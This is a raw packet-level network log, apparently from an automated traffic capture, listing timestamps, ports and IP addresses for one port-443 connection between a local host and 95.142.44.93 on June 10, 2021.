Jun 10, 2021 19:29:43.913116932 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913136959 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913161993 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913177013 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913202047 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913228035 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913237095 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913263083 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913292885 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913304090 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913347006 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913383007 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913418055 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913398981 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913450003 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913455963 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913458109 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913487911 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913501978 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913542032 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913542986 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913570881 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913574934 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913606882 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913641930 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913676977 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913674116 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913711071 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913738012 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913743973 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913748980 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913794041 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913810015 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913820982 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913827896 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913831949 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913836956 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913847923 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913872957 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913909912 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913938046 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.913947105 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.913983107 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914002895 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914017916 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914027929 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914035082 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914038897 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914052963 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914064884 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914097071 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914135933 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914155960 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914171934 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914192915 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914210081 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914217949 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914225101 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914247036 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914259911 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914283037 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914319992 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914321899 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914344072 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914357901 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914366961 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914402962 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914410114 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914443970 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914453030 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914479017 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914498091 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914510012 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914531946 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914549112 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914565086 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914585114 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914598942 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914621115 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914638996 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914657116 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914673090 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914701939 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914711952 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914741039 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914762974 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914776087 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914788961 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914813995 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914830923 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914849997 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914875031 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914884090 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914908886 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914920092 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914922953 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.914957047 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.914978981 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915002108 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915009022 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915041924 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915076017 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915079117 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915106058 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915112019 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915126085 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915175915 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915213108 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915218115 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915230036 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915246964 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915282965 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915302038 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915312052 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915319920 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915348053 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915363073 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915376902 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915410042 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915438890 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915445089 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915472031 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915477037 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915498972 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915513039 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915523052 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915548086 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915580034 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915582895 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915611982 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915637970 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915669918 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915682077 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915694952 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915720940 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915756941 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915791988 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915791035 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915815115 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915821075 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915827990 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915844917 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915862083 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915884972 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915898085 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915911913 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915932894 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915952921 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.915970087 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.915978909 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916011095 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916027069 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916047096 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916063070 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916081905 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916102886 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916117907 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916126013 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916152000 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916169882 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916188002 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916224003 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916228056 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916234970 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916266918 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916282892 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916306973 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916335106 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916342020 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916347980 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916378021 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916397095 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916414022 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916430950 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916448116 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916464090 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916482925 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916501045 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916517973 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916532040 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916563034 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916584969 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916601896 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916615009 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916636944 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916654110 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916676998 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916706085 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916712046 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916721106 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916748047 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916769028 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916785955 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916801929 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916824102 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916840076 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916868925 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916872025 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916907072 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916922092 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916941881 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916960955 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.916977882 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.916996956 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.917015076 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.917036057 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.917048931 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.917084932 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.917087078 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.917121887 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.917124033 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.917148113 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.917165995 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.917185068 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.917205095 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.917226076 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.917238951 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.917254925 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.917273998 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.917292118 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.917325974 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.917330027 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.917378902 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.995424032 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995446920 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995459080 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995474100 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995493889 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995512009 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995527983 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995546103 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995562077 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995562077 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.995578051 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995598078 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995598078 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.995614052 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995634079 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995651960 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995666981 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.995668888 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995685101 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995701075 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995717049 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995737076 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.995739937 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995757103 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995771885 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995786905 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995801926 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995803118 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.995822906 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995841026 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995856047 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995872021 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995887041 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995903015 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995903969 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.995919943 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995935917 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995954037 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995970964 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.995974064 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.995985985 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996002913 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996020079 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996035099 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996040106 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.996051073 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996066093 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996084929 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996102095 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996118069 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996121883 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.996134996 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996153116 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996167898 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996184111 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996185064 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.996200085 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996220112 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996237993 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996249914 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.996256113 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996273041 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996288061 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996304035 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996319056 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996334076 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.996336937 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996356964 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996373892 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996388912 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996404886 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996407986 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.996424913 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996443033 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996459007 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996474981 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996475935 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.996495008 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996512890 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996527910 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996540070 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.996546030 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996562958 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996578932 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996594906 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996611118 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996622086 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.996629953 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996646881 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996661901 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996678114 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996694088 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996700048 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.996710062 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996725082 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.996762991 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.996823072 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.996835947 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:44.075387955 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:44.075448036 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:44.075486898 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:44.075525999 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:44.075563908 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:44.075598955 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:44.075611115 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:44.075635910 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:44.075643063 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:44.075648069 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:44.075655937 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:44.075661898 CEST	49724	443	192.168.2.3	95.142.44.93
